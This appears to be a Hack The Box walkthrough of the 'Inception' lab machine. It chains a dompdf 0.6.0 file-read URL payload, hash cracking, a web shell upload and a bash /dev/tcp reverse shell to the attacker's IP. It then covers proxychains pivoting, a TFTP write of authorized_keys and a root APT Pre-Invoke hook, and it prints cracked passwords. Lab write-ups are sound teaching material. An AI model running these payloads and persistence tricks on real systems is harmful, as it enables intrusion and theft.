Inception

First, we need to enumerate using nmap. $nmap -A -p- 10.10.10.67 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-09 18:53 UTC Scan NSE Timing: About 99.64% done; ETC: 18:55 (0:00:00 remaining) Nmap scan report for 10.10.10.67 Host is up (0.0045s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 80/tcp open Apache httpd 2.4.18 ((Ubuntu)) http |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Inception 3128/tcp open http-proxy Squid http proxy 3.5.12 |_http-server-header: squid/3.5.12 |_http-title: ERROR: The requested URL could not be retrieved Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 146.28 seconds HTTP and Squid proxy is open. Let's enumerate http first. You can find /dompdf by inspecting web page too. gobuster dir -u http://10.10.10.67/ -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.txt,.html /images (Status: 301) [Size: 311] [--> http://10.10.10.67/images/] /index.html (Status: 200) [Size: 2877] /assets (Status: 301) [Size: 311] [--> http://10.10.10.67/assets/] /README.txt (Status: 200) [Size: 2307] /LICENSE.txt (Status: 200) [Size: 17128] gobuster dir -u http://10.10.10.67/ -w /opt/useful/SecLists/Discovery/Web-Content/big.txt -x .php,.txt,.html /.htpasswd (Status: 403) [Size: 295] /.htaccess (Status: 403) [Size: 295] /.htaccess.php (Status: 403) [Size: 299] /.htpasswd.php (Status: 403) [Size: 299] /.htaccess.txt (Status: 403) [Size: 299] /.htpasswd.txt (Status: 403) [Size: 299] /.htpasswd.html (Status: 403) [Size: 300] /.htaccess.html (Status: 403) [Size: 300] /LICENSE.txt (Status: 200) [Size: 17128] /README.txt (Status: 200) [Size: 2307] /assets (Status: 301) [Size: 311] [--> http://10.10.10.67/assets/] /dompdf (Status: 301) [Size: 311] [--> http://10.10.10.67/dompdf/] /images (Status: 301) [Size: 311] [--> http://10.10.10.67/images/] /index.html (Status: 200) [Size: 2877] /server-status (Status: 403) [Size: 299] In /dompdf directory, we found some interesting. http://10.10.10.67/dompdf/VERSION tell us 0.6.0 . So it is dompdf 0.6.0 . Let's find in exploit-db. $searchsploit dompdf 0.6.0 -------------------------------------------------------------------------------------------------------------------- -------------------------------Exploit Title | Path -------------------------------------------------------------------------------------------------------------------- -------------------------------dompdf 0.6.0 - 'dompdf.php?read' Arbitrary File Read | php/webapps/33004.txt dompdf 0.6.0 beta1 - Remote File Inclusion | php/webapps/14851.txt -------------------------------------------------------------------------------------------------------------------- -------------------------------$searchsploit -m 33004 Exploit: dompdf 0.6.0 - 'dompdf.php?read' Arbitrary File Read URL: https://www.exploit-db.com/exploits/33004 Path: /usr/share/exploitdb/exploits/php/webapps/33004.txt File Type: ASCII text, with CRLF line terminators Copied to: /home/htb-emilyz/33004.txt Let's read the exploit. It said we can exploit LFI by entering this url http://example/dompdf.php? input_file=php://filter/read=convert.base64-encode/resource=<PATH_TO_THE_FILE> http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd We get a pdf file. We need to look strings in the pdf file. $ strings dompdf_out.pdf BT 34.016 734.579 Td /F1 12.0 Tf [(cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluO TJ ET Decode thie base64, you will get /etc/passwd . $echo cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9 | base64 -d root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin cobb:x:1000:1000::/home/cobb:/bin/bash Let's read 000-default.conf file. http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/apache2/sitesavailable/000-default.conf After base64 decode it, you will see this output. <VirtualHost *:80> # The ServerName directive sets the request scheme, hostname and port that # the server uses to identify itself. This is used when creating # redirection URLs. In the context of virtual hosts, the ServerName # specifies what hostname must appear in the request's Host: header to # match this virtual host. For the default virtual host (this file) this # value is not decisive as it is used as a last resort host regardless. # However, you must set it for any further virtual host explicitly. #ServerName www.example.com ServerAdmin webmaster@localhost DocumentRoot /var/www/html # Available loglevels: trace8, ..., trace1, debug, info, notice, warn, # error, crit, alert, emerg. # It is also possible to configure the loglevel for particular # modules, e.g. #LogLevel info ssl:warn ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined # For most configuration files from conf-available/, which are # enabled or disabled at a global level, it is possible to # include a line for only one particular virtual host. For example the # following line enables the CGI configuration for this host only # after it has been globally disabled with "a2disconf". #Include conf-available/serve-cgi-bin.conf Alias /webdav_test_inception /var/www/html/webdav_test_inception <Location /webdav_test_inception> Options FollowSymLinks DAV On AuthType Basic AuthName "webdav test credential" AuthUserFile /var/www/html/webdav_test_inception/webdav.passwd Require valid-user </Location> </VirtualHost> # vim: syntax=apache ts=4 sw=4 sts=4 sr noet AuthUserFile in /var/www/html/webdav_test_inception/webdav.passwd . Let's read it again. http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64encode/resource=/var/www/html/webdav_test_inception/webdav.passwd After decode it, you will see this credentials. $echo 'd2ViZGF2X3Rlc3RlcjokYXByMSQ4ck83U21pNCR5cW43SC5HdkpGdHNUb3UxYTdWTUUwCg==' | base64 -d webdav_tester:$apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0 Let's crack using hashcat. The complete credential is webdav_tester:babygurl69 $hashcat -m 1600 hash.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt $apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0:babygurl69 Session..........: hashcat Status...........: Cracked Hash.Name........: Apache $apr1$ MD5, md5apr1, MD5 (APR) Hash.Target......: $apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0 Time.Started.....: Thu Dec 9 19:13:39 2021 (3 secs) Time.Estimated...: Thu Dec 9 19:13:42 2021 (0 secs) Guess.Base.......: File (/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 9071 H/s (8.48ms) @ Accel:256 Loops:125 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests Progress.........: 22528/14344384 (0.16%) Rejected.........: 0/22528 (0.00%) Restore.Point....: 21504/14344384 (0.15%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:875-1000 Candidates.#1....: 212224236248 -> travon Started: Thu Dec 9 19:12:38 2021 Stopped: Thu Dec 9 19:13:43 2021 Let's upload web shell using this credentials. $cadaver http://10.10.10.67/webdav_test_inception Authentication required for webdav test credential on server `10.10.10.67': Username: webdav_tester Password: dav:/webdav_test_inception/> put /home/htb-emilyz/Desktop/hackthebox/webshell.php Uploading /home/htb-emilyz/Desktop/hackthebox/webshell.php to `/webdav_test_inception/webshell.php': Progress: [=============================>] 100.0% of 300 bytes succeeded. Let's execute reverse shell. bash -c 'bash -i >& /dev/tcp/10.10.14.22/9002 0>&1' We can't get a connection back because of squid proxy. Let's look round the system using webshell. The path of the file is cat ../wordpress_4.8.3/wp-config.php // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'wordpress'); /** MySQL database username */ define('DB_USER', 'root'); /** MySQL database password */ define('DB_PASSWORD', 'VwPddNh7xMZyDQoByQL4'); /** MySQL hostname */ define('DB_HOST', 'localhost'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ''); Yah, we get a credential but i can't connect the ssh. SSH is internally hosted on this server. Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - tcp6 0 0 :::3128 :::* LISTEN - tcp6 0 0 192.168.0.10:80 192.168.0.1:44398 ESTABLISHED - So, we must use proxychains. Configuration file is /etc/proxychains.conf $cat /etc/proxychains.conf | tail # # # proxy types: http, socks4, socks5 ( auth types supported: "basic"-http "user/pass"-socks ) # [ProxyList] # add proxy here ... # meanwile # defaults set to "tor" http 10.10.10.67 3128 Let's connect ssh using proxychains. $proxychains ssh cobb@127.0.0.1 ProxyChains-3.1 (http://proxychains.sf.net) |S-chain|-<>-10.10.10.67:3128-<><>-127.0.0.1:22-<><>-OK The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. ECDSA key fingerprint is SHA256:dr5DOURssJH5i8VbjPxvbeM+e2FyMqJ8DGPB/Lcv1Mw. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts. cobb@127.0.0.1's password: VwPddNh7xMZyDQoByQL4 Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-101-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage Last login: Thu Nov 30 20:06:16 2017 from 127.0.0.1 cobb@Inception:~$ Check privileges and then switch to root. We can't find root.txt. cobb@Inception:~$ sudo -l [sudo] password for cobb: Matching Defaults entries for cobb on Inception: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User cobb may run the following commands on Inception: (ALL : ALL) ALL cobb@Inception:~$ sudo -i root@Inception:~# cat /root/root.txt You're waiting for a train. A train that will take you far away. Wake up to find root.txt. Wtih ifconfig , we can find ip address. root@Inception:~# ifconfig eth0 Link encap:Ethernet HWaddr 00:16:3e:28:53:63 inet addr:192.168.0.10 Bcast:192.168.0.255 Mask:255.255.255.0 inet6 addr: fe80::216:3eff:fe28:5363/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:322521 errors:0 dropped:0 overruns:0 frame:0 TX packets:308666 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:50401957 (50.4 MB) lo TX bytes:153554522 (153.5 MB) Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:512 errors:0 dropped:0 overruns:0 frame:0 TX packets:512 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 RX bytes:52195 (52.1 KB) TX bytes:52195 (52.1 KB) We can find gateway address with arp -a . root@Inception:~# arp -a ? (192.168.0.1) at fe:28:c4:25:5c:1b [ether] on eth0 Scan this network using netcat. root@Inception:~# nc -zvn 192.168.0.1 1-1000 2>&1 | grep -v "Connection refused" Connection to 192.168.0.1 21 port [tcp/*] succeeded! Connection to 192.168.0.1 22 port [tcp/*] succeeded! Connection to 192.168.0.1 53 port [tcp/*] succeeded! Let's connect to ftp. root@Inception:~# ftp 192.168.0.1 Connected to 192.168.0.1. 220 (vsFTPd 3.0.3) Name (192.168.0.1:cobb): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 0 4096 Nov 30 2017 bin drwxr-xr-x 3 0 0 4096 Nov 30 2017 boot drwxr-xr-x 19 0 0 3920 Dec 09 18:53 dev drwxr-xr-x 93 0 0 4096 Nov 30 drwxr-xr-x 2 0 0 4096 Nov 06 lrwxrwxrwx 1 0 0 33 Nov 30 lrwxrwxrwx 1 0 0 32 Nov 06 drwxr-xr-x 22 0 0 4096 Nov 30 2017 lib drwxr-xr-x 2 0 0 4096 Oct 30 2017 lib64 drwx------ 2 0 0 16384 Oct 30 drwxr-xr-x 3 0 0 4096 Oct 30 2017 media drwxr-xr-x 2 0 0 4096 Aug 01 2017 mnt drwxr-xr-x 2 0 0 4096 Aug 01 2017 opt dr-xr-xr-x 200 0 0 drwx------ 6 0 0 drwxr-xr-x 26 0 0 drwxr-xr-x 2 0 0 12288 Nov 30 2017 sbin drwxr-xr-x 2 0 0 4096 Apr 29 2017 snap drwxr-xr-x 3 0 0 4096 Nov 06 2017 srv dr-xr-xr-x 13 0 0 0 Dec 09 18:53 sys drwxrwxrwt 10 0 0 4096 Dec 09 19:48 tmp drwxr-xr-x 10 0 0 4096 Oct 30 2017 usr drwxr-xr-x 13 0 0 4096 Oct 30 2017 var lrwxrwxrwx 1 0 0 30 Nov 30 2017 vmlinuz -> boot/vmlinuz-4.4.0-101-generic lrwxrwxrwx 1 0 0 29 Nov 06 2017 vmlinuz.old -> boot/vmlinuz-4.4.0-98-generic 2017 etc 2017 home 2017 initrd.img -> boot/initrd.img-4.4.0-101-generic 2017 initrd.img.old -> boot/initrd.img-4.4.0-98-generic 2017 lost+found 0 Dec 09 18:53 proc 4096 Nov 08 2017 root 920 Dec 09 18:53 run 226 Directory send OK. We will Download file like /etc/passwd , /etc/crontab , /etc/default/tftpd-hpa . apt update is running every five minute. root@Inception:~# cat crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) */5 * * * * root apt update 2>&1 >/var/log/apt/custom.log 30 23 * * * root apt upgrade -y 2>&1 >/dev/null root TFTP allows directory. root@Inception:~# cat tftpd-hpa # /etc/default/tftpd-hpa TFTP_USERNAME="root" TFTP_DIRECTORY="/" TFTP_ADDRESS=":69" TFTP_OPTIONS="--secure --create" Let's ssh-keygen. root@Inception:~# ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): Created directory '/root/.ssh'. Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /root/.ssh/id_rsa. Your public key has been saved in /root/.ssh/id_rsa.pub. The key fingerprint is: SHA256:rp/i/FAlGrmsgPjEb9T5Xul6ym/pBTmfu7A07FR0aSU root@Inception The key's randomart image is: +---[RSA 2048]----+ | E .| | . | + | o . . . + |.o o = o o o | | |o + . * S + . | | o + . + . * . | | . + . o O.+ | | . ..= B+= . | | .++OB* o. | +----[SHA256]-----+ Put into /root/.ssh/authorized_keys using TFTP. tftp 192.168.0.1 > put /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys We were not much sure how to change permission through apt-update command. That Links helps us in generating apt update command for changing authorized key permission. https://www.cyberciti.biz/faq/debian-ubuntu-linux-hook-a-script-command-to-apt-get-upgradecommand/ echo 'APT::Update::Pre-Invoke {"chmod 600 /root/.ssh/authorized_keys"};' > rootshell tftp 192.168.0.1 put rootshell /etc/apt/apt.conf.d/rootshell Login to gateway using ssh key. root@Inception:~# ssh -i id_rsa root@192.168.0.1 Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-101-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 0 packages can be updated. 0 updates are security updates. Last login: Thu Dec root@Inception:~# 9 20:01:28 2021 from 192.168.0.10

Inception

Add this document to collection(s)

Add this document to saved

Suggest us how to improve StudyLib